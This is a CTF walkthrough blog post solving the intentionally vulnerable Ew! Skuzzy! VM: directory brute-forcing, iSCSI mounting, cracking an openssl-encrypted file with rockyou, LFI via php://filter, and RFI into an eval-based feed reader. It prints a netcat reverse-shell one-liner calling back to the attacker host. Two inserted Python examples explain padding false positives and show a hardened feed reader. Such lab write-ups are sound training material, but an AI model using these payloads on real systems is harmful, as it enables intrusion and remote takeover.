Mr_H4sh

Infosec, CTF and more

Ew! Skuzzy! Solution

In this post I’m going to show you how to solve the Ew! Skuzzy! VM provided by vortex.

You can find the VM on this link

The goal of the VM is to gain root access to the machine and capture 5 flags.

Attacker: 192.168.56.1
Victim: 192.168.56.101

I run an nmap scan against the victim, and this is what I get:

Nmap scan report for 192.168.56.101
Host is up (0.00017s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
MAC Address: 08:00:27:60:88:83 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

I visit the URL http://192.168.56.101 and this is what I get:

______            _____ __                         __
/ ____/      __   / ___// /____  __________  __  __/ /
/ __/ | | /| / /   \__ \/ //_/ / / /_  /_  / / / / / / 
/ /___ | |/ |/ /   ___/ / ,< / /_/ / / /_/ /_/ /_/ /_/  
/_____/ |__/|__/   /____/_/|_|\__,_/ /___/___/\__, (_)   
                                            /____/      
Welcome to 'Ew Skuzzy!' - my first CTF VM. 
Level: Intermediate.

Forgive the name... I heard a kid say it in a shopping centre; Or, perhaps it's a hint? Or am I trolling? ¯\_(ツ)_/¯ 

You'll just have to fireup dirbuster and find out! 

Flags will be found along the way, if you're on the right path. Most flag data is not of any signifigance to the challenge.

Hints available at /dev/null, or ping me on Twitter @vortexau (UTC+9.5 timezone, I'm probably sleeping while you're awake!).

Please let me know what you think of the challenge once you're done, and submit your walkthroughs to VulnHub, I'm really looking forward to reading them!

So, the machine invites me to run dirbuster, so I start it with the big.txt wordlist to find out what is hidden. This wordlist discovers the URL http://192.168.56.101/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/, but the page returns an HTTP 403 Forbidden error.

I look at the whole URL. The word smblogin on its own doesn’t return anything interesting, but googling smblogin custom-log arquivos url returns a link to the wordlist common_and_portuguese.txt from the SecLists wordlist collection. So I run dirb again with this wordlist and I find the URL http://192.168.56.101/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/mode/trap/affiliates/dba/program/font/index.html

I open the URL and I find an image of Lionel Richie that says “Hello? Is it flags you're looking for?”. Nice, he looks quite young there, but I have a look at the source code of the page and I find a comment:

<!--
SGVsbG8sIGlzIGl0IGZsYWdzIHlvdSdyZSBsb29raW5nIGZvcj8KSSBjYW4gc2VlIGl0IGluIHlv
dXIgZXllcwpJIGNhbiBzZWUgaXQgaW4geW91ciBzbWlsZQpGbGFncyBhcmUgYWxsIEkndmUgZXZl
ciB3YW50ZWQgYW5kIG15IHBvcnRzIGFyZSBvcGVuIHdpZGUgCkNhdXNlIHlvdSBrbm93IGp1c3Qg
d2hhdCB0byBzYXkgYW5kIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBkbwpBbmQgSSB3YW50IHRvIHRl
bGwgeW91IHNvIG11Y2gsIG5vIGZsYWdzIGZvciB5b3UuLi4K
-->

It’s encoded in Base64, so I decode it and this is what I get:

$ cat comment_lionel.txt | base64 -d
Hello, is it flags you're looking for?
I can see it in your eyes
I can see it in your smile
Flags are all I've ever wanted and my ports are open wide 
Cause you know just what to say and you know just what to do
And I want to tell you so much, no flags for you...

Right, this is a modified version of the song “Hello” by Lionel Richie. Looks like a troll, but he talks about ports “open wide”, and there’s a port that I’ve already checked but got nothing back from: port 3260. I check what service should be running on port 3260:

$ whatportis 3260
+--------------+------+----------+-------------+
| Name         | Port | Protocol | Description |
+--------------+------+----------+-------------+
| iscsi-target | 3260 |   tcp    | iSCSI port  |
| iscsi-target | 3260 |   udp    | iSCSI port  |
+--------------+------+----------+-------------+

An iSCSI service, and it looks like nmap kinda agrees:

$ nmap -sV -p 3260 -Pn -n -v 192.168.56.101

Scanning 192.168.56.101 [1 port]
Discovered open port 3260/tcp on 192.168.56.101
Completed Connect Scan at 05:11, 0.00s elapsed (1 total ports)
Initiating Service scan at 05:11
Scanning 1 service on 192.168.56.101
Completed Service scan at 05:12, 93.59s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.56.101.
Initiating NSE at 05:12
Completed NSE at 05:12, 1.36s elapsed
Nmap scan report for 192.168.56.101
Host is up (0.00024s latency).
PORT     STATE SERVICE VERSION
3260/tcp open  iscsi?

I have a look on Wikipedia about this service, and something gets my attention:

In computing, iSCSI (/aɪˈskʌzi/ eye-skuz-ee) is an acronym for Internet Small Computer Systems Interface

Did you see it? eye-skuz-ee, quite similar to the name of the VM… I might be on the right path.

So, I follow the guide on https://www.cyberciti.biz/faq/howto-setup-debian-ubuntu-linux-iscsi-initiator/ to connect to this system.

# iscsiadm --mode discovery --type sendtargets --portal 192.168.56.101
192.168.56.101:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

Still following the guide: the discovery step gave me the target name, and now I need to log in so the disk gets attached to my machine:

# iscsiadm --mode node --targetname iqn.2017-02.local.skuzzy:storage.sys0 --portal 192.168.56.101:3260 --login
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.56.101,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.56.101,3260] successful.

# df -h
Filesystem      Size  Used Avail Use% Mounted on
udev            9.6G     0  9.6G   0% /dev
tmpfs           2.0G   14M  2.0G   1% /run
/dev/sda1        95G   74G   17G  82% /
tmpfs           9.6G   34M  9.6G   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           9.6G     0  9.6G   0% /sys/fs/cgroup
cgmfs           100K     0  100K   0% /run/cgmanager/fs
tmpfs           2.0G   80K  2.0G   1% /run/user/1000
/dev/sdc        976M  1.8M  907M   1% /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e

Bingo: look at /dev/sdc, mounted on /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e, and there’s flag1.txt:

# ls -lah /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e
total 556K
drwxr-xr-x  3 root root 4.0K Feb 28 08:56 .
drwxr-x---+ 5 root root 4.0K Mar 22 05:23 ..
-rw-r--r--  1 root root 100M Mar  5 09:00 bobsdisk.dsk
-rw-r--r--  1 root root  143 Feb 28 08:48 flag1.txt
drwx------  2 root root  16K Feb 28 08:39 lost+found

$ cat /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/flag1.txt
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

So, now there’s this file that looks like a disk image, so I mount it on my computer and look at the content:

# file /media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/bobsdisk.dsk
/media/anthony/e0ca44be-b1ed-403a-84bd-db5558d6bb7e/bobsdisk.dsk: Linux rev 1.0 ext2 filesystem data, UUID=faef0c66-b61b-4d80-8c20-5e8da65345d4 (large files)

# mkdir mount

# mount ./bobsdisk.dsk mount/

# ls -la mount/
total 17
drwxr-xr-x 3 root    root     1024 Mar  5 09:00 .
drwxrwxrwx 1 anthony anthony   208 Mar 22 05:31 ..
drwx------ 2 root    root    12288 Feb 28 08:56 lost+found
-rw-r--r-- 1 root    root      288 Feb 28 09:25 ToAlice.csv.enc
-rw-r--r-- 1 root    root     2342 Mar  5 09:00 ToAlice.eml

An encrypted file and a message, and the second flag:

# cat ToAlice.eml 
G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly.

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. 

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) :)

Cheers,

Bob.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

Right, so I do some research on how to decrypt a file with openssl (check https://www.shellhacks.com/encrypt-decrypt-file-password-openssl/), and following the hints in the message I see that I need to add -md sha256 to decrypt, and that the password should be in the rockyou.txt wordlist since it’s mentioned, so I come up with the following bash script:

#!/bin/bash
# Try every line of rockyou.txt as the passphrase. Reading line by line with
# read -r (instead of "for PASSWORD in $(cat ...)") keeps passwords containing
# spaces or shell glob characters intact. The only success signal here is
# openssl's exit status.

while IFS= read -r PASSWORD; do
    if openssl enc -d -aes-256-cbc -md sha256 -in ToAlice.csv.enc -out ToAlice.csv -k "$PASSWORD" 2>/dev/null; then
        echo "Candidate password: $PASSWORD"
    fi
done < ./rockyou.txt

With this script I get a bunch of false positives. I check online and find out that with AES-CBC openssl can only tell whether “decryption worked” by checking that the last block ends in valid padding; a wrong key produces random data, which happens to end in valid padding roughly once every 256 attempts, so the file “decrypts” but the content is not recovered.

This means that, from the candidate passwords I collected, I need another script that checks the output file, i.e. looks at the content every time the file gets decrypted.

After almost a day I have over 5000 false positives from the rockyou.txt wordlist (over 14 million passwords)… what to do then? I have to run another script that checks the content of the file every time it decrypts. So I wrote a second script doing the same thing (I know, I could have done this in the first place, but it didn’t come to mind at the time), logging everything into separate files; then I wait until it finishes and grep for words mentioned in the email. The script is the following:

#!/bin/bash
# Re-run the candidates that passed the padding check and keep every decrypted
# output for inspection, since exit status 0 on its own proves nothing.
# (The original used "cat" where "echo" was meant, which never wrote the log.)

mkdir -p test

while IFS= read -r PASSWORD; do
    if openssl enc -d -aes-256-cbc -md sha256 -in ToAlice.csv.enc -out ToAlice.csv -k "$PASSWORD" 2>/dev/null; then
        echo "Found password: $PASSWORD" >> found.log
        # one file per candidate, named after the password (a password containing "/" would need escaping)
        cp ToAlice.csv "test/$PASSWORD.log"
    fi
done < ./passphrases.txt
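
Why the exit status lies, as an added example that is not part of the original write-up or of the VM: the two scripts above treat openssl's exit code as proof of the right password, but the only thing `openssl enc -d` can check in CBC mode is that the final block ends in well-formed PKCS#7 padding. The Python below (function names and the constructed sample are mine) reimplements that padding check, measures how often random final blocks pass it, and adds the plaintext-plausibility test that the grep in the next step was doing by hand.

```python
import random
import string

BLOCK = 16  # AES block size in bytes


def pkcs7_unpad(buf):
    """Return the payload with PKCS#7 padding stripped, or None if the padding
    is malformed. This is the only check openssl enc performs on the last block:
    it has no way of knowing whether the key was right."""
    if not buf or len(buf) % BLOCK:
        return None
    n = buf[-1]
    if n < 1 or n > BLOCK or buf[-n:] != bytes([n]) * n:
        return None
    return buf[:-n]


def padding_acceptance_rate(trials, seed=0):
    """Feed random 'decrypted' final blocks to the padding check and return the
    fraction accepted. A wrong key yields a pseudo-random block, so this is the
    false-positive rate of 'exit status 0' as a password oracle (about 1/256)."""
    rng = random.Random(seed)  # fixed seed so the measurement is reproducible
    accepted = 0
    for _ in range(trials):
        block = rng.getrandbits(8 * BLOCK).to_bytes(BLOCK, "big")
        if pkcs7_unpad(block) is not None:
            accepted += 1
    return accepted / trials


_TEXT_OK = set(bytes(string.printable, "ascii"))


def looks_like_text(payload, threshold=0.95):
    """Plausibility check for a candidate plaintext: at least `threshold` of the
    bytes are printable ASCII or whitespace. Garbage from a wrong key fails this
    even when its padding happened to be valid."""
    if not payload:
        return False
    good = sum(1 for b in payload if b in _TEXT_OK)
    return good / len(payload) >= threshold


def classify_candidate(decrypted):
    """Combine both checks the way a careful verifier should:
    'rejected'  - padding malformed (openssl would have exited non-zero)
    'padding'   - padding valid but the content is not plausible text
    'text'      - padding valid and the content looks like real plaintext"""
    payload = pkcs7_unpad(decrypted)
    if payload is None:
        return "rejected"
    return "text" if looks_like_text(payload) else "padding"


if __name__ == "__main__":
    rate = padding_acceptance_rate(100_000)
    print(f"random final blocks accepted by the padding check: {rate:.4%}")
    # constructed sample, padded by hand the way a CBC encryptor would
    sample = b"Web Path,Reason\nabc,Nice clean site.\n"
    pad = BLOCK - len(sample) % BLOCK
    sample += bytes([pad]) * pad
    print("constructed CSV sample ->", classify_candidate(sample))
    print("random-looking block   ->", classify_candidate(b"\x80" * 15 + b"\x01"))
```

The practical lesson for anyone scripting this kind of recovery is that the padding check and the content check are two different signals: the first is cheap and rejects 255 out of 256 wrong keys, the second is what actually confirms a hit.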

And, finally (man, it was a pain), I find that the passphrase was “supercalifragilisticoespialidoso”:

# grep -i "hacker" ./*
./supercalifragilisticoespialidoso.log:5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 

# cat ./supercalifragilisticoespialidoso.log
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

Finally, got the third flag.

Using the hashes from the file as paths, I visit the URL http://192.168.56.101/5560a1468022758dba5e92ac8f2353c0 and I find a page with the following source code:

<html>
<head>
<title>Hackers! They're everywhere!</title>
</head>
<body bgcolor="black" text="#00ff00">
<center>
<marquee width="50%"><font face="arial, helvetica" size="20">HACKER DETECTED! HACKER DETECTED! HACKER DETECTED!</font></marquee>
<!-- 
Yeah, I'm bringing Marquee back, suckers!
Just not in Chrome. Thanks, Google. Firefox is still rocking the marquee tag Geocities style though! 
-->
<img src="hacker.jpg" />
</center>
</body>
</html>
<!-- 
R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
-->

I decode the Base64 comment and this is what I get:

# cat base64_hint.txt | base64 -d
George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 
Soup Nazi: NO FLAG FOR YOU

Another troll.

I then visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b and I find a web application called “My great web app”. I visit http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=flag but guess what? It’s another troll. I then visit the Feed Reader section, which has a URL to load feeds: http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt. RFI doesn’t work: I tried http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://192.168.56.1/simple-backdoor.php but I get the error “Authentication invalid. You might need a key.”. At this point I visit http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/data.txt, the URL called from the Feed section, and I find the following content:

##text##
This is some example source data for my nice little feed reader. I have designed my own nice little format which will allow it to include dynamic content. Who needs consultants when it's this easy? :) 

One of the best things is this will allow me to host my feed content to display on this page on an external server! So flexible :D
##text##

##php##
print("See? This is totally dynamic, generated by PHP right in my own little tool. Hacker proof, too, because there is a secret key required!");
##php##

Ok, basically the page parses the content of data.txt and shows it in the page, using the ##php## keyword to mark sections that are run as PHP code.

I visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=/etc/passwd%00 and I get the following output:

Now now.. We paid mega bucks to a big consultancy to mitigate skiddy tricks like that one! :trollface:

I instead try to visit http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=/etc/issue and I get the following output:

<header>
<h1>My great web-app!</h1>
</header>

<nav>
<ul>
<li><a href="?p=welcome">Welcome</a></li>
<li><a href="?p=flag">Flag</a></li>
<li><a href="?p=party">Let's Party!</a></li>
<li><a href="?p=reader">Feed Reader</a></li>
</ul>
</nav>

<article>

                                        __ 
_____          _____                    |  |
|   __|_ _ _   |   __|___ _ _ ___ ___ _ _|  |
|   __| | | |  |__   |  _| | |- _|- _| | |__|
|_____|_____|  |_____|___|___|___|___|_  |__|
                                    |___|   

Intentionally Vulnerable VM! Do not expose to the Internet!

Developed By - vortex
twitter: @vortexau
email: vortex@juicedigital.net 

Hints available at /dev/null (or ping me on Twitter)

Assigned IP: 192.168.56.101/24



</article>

<footer>Hack the Planet!</footer>

SWEET! Vulnerable to LFI.

I visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=/var/www/html/c2444910794e037ebd8aaf257178c90b/flag.php, and the page renders the troll face again. I try using the php://filter wrapper through the Local File Inclusion to read the source code of the page instead of executing it, and this time I get the following output visiting http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=/var/www/html/c2444910794e037ebd8aaf257178c90b/flag.php:

<header>
<h1>My great web-app!</h1>
</header>

<nav>
<ul>
<li><a href="?p=welcome">Welcome</a></li>
<li><a href="?p=flag">Flag</a></li>
<li><a href="?p=party">Let's Party!</a></li>
<li><a href="?p=reader">Feed Reader</a></li>
</ul>
</nav>

<article>
PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
</article>

Which, decoded from base64, is the following:

$ cat flag_php_base64.txt | base64 -d
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag! 
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
// 
// Well done, you're doing great so far!
// Next step. SHELL!
//
// 
// Oh. That flag above? You're gonna need it... 
?>

One more flag! Now I gotta get a shell.

The only page that could give me hope is /var/www/html/c2444910794e037ebd8aaf257178c90b/reader.php, so I visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=/var/www/html/c2444910794e037ebd8aaf257178c90b/reader.php, copy the encoded content into a file, decode it, and this is what I find:

<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
$url = $_GET['url'];
} else {
print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

// Setup some variables.
$secretok = false;
$keyneeded = true;

// Localhost as a source doesn't need to use the key.
if(preg_match("#^http://127.0.0.1#", $url)) {
    $keyneeded = false;
    $secretok = true;
}

// Handle the key validation when it's needed.
if($keyneeded) {
    $key = $_GET['key'];
    if(is_array($key)) {
        die("Array trick is mitigated ;)");
    }
    if(isset($key) && strlen($key) == '47') {
    $hashedkey = hash('sha256', $key);
        $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

        // If you can use the following code for a timing attack
        // then good luck :) But.. You have the source anyway, right? :) 
    if(strcmp($hashedkey, $secret) == 0) {
            $secretok = true;
        } else {
            die("Sorry... Authentication failed. Key was invalid.");
    }

    } else {
        die("Authentication invalid. You might need a key.");
    }
}

// Just to make sure the above key check was passed.
if(!$secretok) {
    die("Something went wrong with the authentication process");
}

// Now load the contents of the file we are reading, and parse
// the super awesomeness of its contents!
$f = file_get_contents($url);

$text = preg_split("/##text##/s", $f);

if(isset($text['1']) && strlen($text['1']) > 0) {
    print($text['1']);
}

print "<br /><br />";

$php = preg_split("/##php##/s", $f);

if(isset($php['1']) && strlen($php['1']) > 0) { 
    eval($php['1']);
    // "If Eval is the answer, you're asking the wrong question!" - SG
    // It hurts me to write insecure code like this, but it is in the
    // name of education, and FUN, so I'll let it slide this time.
}
}

So, we need to find a key to put in the key query-string parameter of reader.php in order to load a feed from a remote host (RFI).

After a while and various attempts, I understand that the key is flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}, based on the message in the flag.php file (the key length check is 47 characters, exactly the length of that flag).
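
The checks in reader.php can be tightened without changing the page's interface. As an added example (my own Python, not code from the VM or from the author; the function names, the constructed feed document and the key/hash pair used when running it are assumptions), here is a hardened rendition of the three decisions the script makes: the loopback exemption parses the URL and checks the host component instead of prefix-matching the string, the key check rejects non-string input and compares SHA-256 digests in constant time rather than with strcmp, and the ##php## segment is returned as inert text and never handed to eval.

```python
import hashlib
import hmac
import re
from urllib.parse import urlparse

KEY_LEN = 47  # the fixed key length reader.php demands before hashing


def sha256_hex(s):
    """Hex SHA-256 of a string, the same transform reader.php applies to the key."""
    return hashlib.sha256(s.encode()).hexdigest()


def is_local_source(url):
    """Strict replacement for preg_match('#^http://127.0.0.1#', $url):
    parse the URL and require the host itself to be the loopback address."""
    parts = urlparse(url)
    return parts.scheme == "http" and parts.hostname == "127.0.0.1"


def check_key(key, expected_sha256_hex):
    """Replacement for the strlen/strcmp check: reject anything that is not a
    string (the 'array trick'), require the fixed length, then compare digests
    with hmac.compare_digest so the comparison time does not depend on the key."""
    if not isinstance(key, str) or len(key) != KEY_LEN:
        return False
    return hmac.compare_digest(sha256_hex(key), expected_sha256_hex)


def authorize(url, key, expected_sha256_hex):
    """True when the request may fetch `url`: loopback sources are exempt,
    everything else needs a valid key (same policy as the original)."""
    return is_local_source(url) or check_key(key, expected_sha256_hex)


def parse_feed(body):
    """Mirror of the preg_split logic in reader.php: element [1] of each split
    is whatever sits between the first pair of markers. Unlike the original,
    the ##php## segment is data to be displayed or logged, never evaluated."""
    text = re.split(r"##text##", body)
    php = re.split(r"##php##", body)
    return {
        "text": text[1] if len(text) > 1 else "",
        "php_segment": php[1] if len(php) > 1 else "",
    }


def render_feed(url, key, expected_sha256_hex, fetch):
    """Full request flow: authorise, fetch, parse. `fetch` is injected so the
    example runs offline against a constructed document instead of doing HTTP.
    Returns the text segment, or None when authentication fails."""
    if not authorize(url, key, expected_sha256_hex):
        return None
    return parse_feed(fetch(url))["text"]


if __name__ == "__main__":
    # constructed key and feed document for the demo; not values from the VM
    demo_key = "k" * KEY_LEN
    demo_hash = sha256_hex(demo_key)
    demo_doc = "##text##\nHello from a feed\n##text##\n\n##php##\nprint('never run');\n##php##\n"
    fetch = lambda url: demo_doc
    print(render_feed("http://127.0.0.1/data.txt", None, demo_hash, fetch))
    print(render_feed("http://192.0.2.10/data.txt", demo_key, demo_hash, fetch))
    print(render_feed("http://192.0.2.10/data.txt", "wrong", demo_hash, fetch))
    print(parse_feed(demo_doc)["php_segment"].strip(), "<- returned as text, not executed")
```

The point of keeping `parse_feed` format-compatible is that the same data.txt the application already serves still renders; what disappears is the code path that turned a remote feed into remote code execution.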

I set up a data.txt reachable from http://192.168.56.1/data.txt with the following content:

Ok, all set. I visit the URL http://192.168.56.101/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://192.168.56.1/data.txt&key=flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} a few times: first to check which PHP functions are disabled, then with a data.txt containing a reverse shell command to eventually get a reverse shell. No function that would stop me from running shell commands is disabled, so I do the following:

# cat data.txt 
##php##
phpinfo();
##php##
# php -S 0.0.0.0:80
PHP 7.0.15-0ubuntu0.16.04.2 Development Server started at Wed Mar 22 14:47:16 2017
Listening on http://0.0.0.0:80
Document root is /ew_skuzzy
Press Ctrl-C to quit.
[Wed Mar 22 14:49:46 2017] 192.168.56.101:49544 [200]: /data.txt
^C
# vim data.txt
# cat data.txt 
##php##
shell_exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 4444 >/tmp/f');
##php##
# php -S 0.0.0.0:80
PHP 7.0.15-0ubuntu0.16.04.2 Development Server started at Wed Mar 22 19:15:02 2017
Listening on http://0.0.0.0:80
Document root is /media/anthony/Anthony PT External/ctf/ew_skuzzy
Press Ctrl-C to quit.
[Wed Mar 22 14:51:11 2017] 192.168.56.101:49560 [200]: /data.txt

And on the other terminal I get a reverse shell:

# nc -lnvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.56.101] port 4444 [tcp/*] accepted (family 2, sport 41612)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ hostname
skuzzy
$ /sbin/ifconfig
enp0s3    Link encap:Ethernet  HWaddr 08:00:27:60:88:83  
        inet addr:192.168.56.101  Bcast:192.168.56.255  Mask:255.255.255.0
        inet6 addr: fe80::a00:27ff:fe60:8883/64 Scope:Link
        UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
        RX packets:832540 errors:179 dropped:0 overruns:0 frame:0
        TX packets:807697 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1000 
        RX bytes:174883630 (174.8 MB)  TX bytes:508605160 (508.6 MB)
        Interrupt:19 Base address:0xd020 

lo        Link encap:Local Loopback  
        inet addr:127.0.0.1  Mask:255.0.0.0
        inet6 addr: ::1/128 Scope:Host
        UP LOOPBACK RUNNING  MTU:65536  Metric:1
        RX packets:278812 errors:0 dropped:0 overruns:0 frame:0
        TX packets:278812 errors:0 dropped:0 overruns:0 carrier:0
        collisions:0 txqueuelen:1 
        RX bytes:20637869 (20.6 MB)  TX bytes:20637869 (20.6 MB)

Perfect, I’m in.

I check the /etc/passwd file, and this is what I find:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
